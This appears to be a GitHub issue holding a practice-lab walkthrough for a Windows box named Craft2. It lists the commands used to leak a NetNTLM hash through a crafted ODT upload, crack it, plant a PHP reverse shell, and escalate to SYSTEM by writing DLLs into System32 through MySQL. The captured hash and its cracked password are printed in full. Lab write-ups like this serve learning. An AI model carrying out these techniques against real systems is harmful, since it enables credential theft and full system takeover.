search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Craft2 (hard, Windows, 2022) ★ - made bad odt file to leak NetNTLM hash, mysql has write permission as root #46

Open WDavid404 opened 3 months ago

WDavid404 commented 3 months ago

Keypoints:

WDavid404 commented 3 months ago 
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Craft
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack ttl 125
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

80/tcp click "Admin logon" --> javascript:alert image

Upload file button: upload a php file --> invalid file
image

http://192.168.156.188/upload.php image

upload a php.odt file --> You're resume was submitted, it will be reviewed shortly by our staff. We are also aware of macro phishing attempts made previously

Search exploit about craft -->

445/tcp (SMB): --> crackmapexec smb 192.168.156.188 --shares image

smbclient --no-pass //192.168.156.188/CRAFT2/ --> Failed (session setup failed: NT_STATUS_ACCESS_DENIED)

since it upload ODT file --> search exploit info about ODT --> image

pip2.7 install ezodf  
python2.7 44564.py

image Got stuck...

find python3 version for generating a malicious odf file to leak NetNTLM Creds: https://github.com/rmdavy/badodf/blob/master/badodt.py

(Need "pip3 install ezodf" at first) image

On kali, start a smbserver impacket-smbserver smb_wei . -smb2support Upload bad.odt file on Craft2 webpage, after a while, we get NTML info image thecybergeek::CRAFT2:aaaaaaaaaaaaaaaa:5f56d9e5a2e3c9ca22f29a30734bf3c4:010100000000000080fdef619ce4da01ddff63db32dd50d200000000010010004e0064006c0063005000410041004f00030010004e0064006c0063005000410041004f00020010007000660048004e0054004e0079007a00040010007000660048004e0054004e0079007a000700080080fdef619ce4da010600040002000000080030003000000000000000000000000030000086133d4ee0733a819b55e3a4c1cb1c1188f700332547ae4689846629f77fcbdf0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200300035000000000000000000

copy all string above to hash.txt and execute john command (hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt also works) image --> winniethepooh

enum4linux -a -u "CRAFT2\\thecybergeek" -p "winniethepooh" 192.168.156.188 image Go to share dir: smbclient //192.168.156.188/WebApp -U 'CRAFT2\thecybergeek' image Found we can upload files here and access it via http://$IP/ so upload a reverse shell php file https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

then, access "http://192.168.156.188/php_windows_reverse_shell.php" --> Got a reverse shell successfully. image

PE

winpeas: image image

--> mysql server is runing and have write permission as root.

According to the resource:

  1. Clone https://github.com/sailay1996/WerTrigger
  2. Copy phoneinfo.dll to C:\Windows\System32\ ---> move those files to C:\windows\system32 using MySQL.
  3. Place Report.wer file and WerTrigger.exe in a same directory --> move those files to C:\windows\system32 using MySQL. 
    select load_file('C:\\xampp\\htdocs\\phoneinfo.dll') into dumpfile 'C:\\Windows\\system32\\phoneinfo.dll';
select load_file('C:\\xampp\\htdocs\\Report.wer') into dumpfile 'C:\\Windows\\system32\\Report.wer';
select load_file('C:\\xampp\\htdocs\\WerTrigger.exe') into dumpfile 'C:\\Windows\\system32\\WerTrigger.exe';
  4. Then, run WerTrigger.exe.
  5. Enjoy a shell as NT AUTHORITY\SYSTEM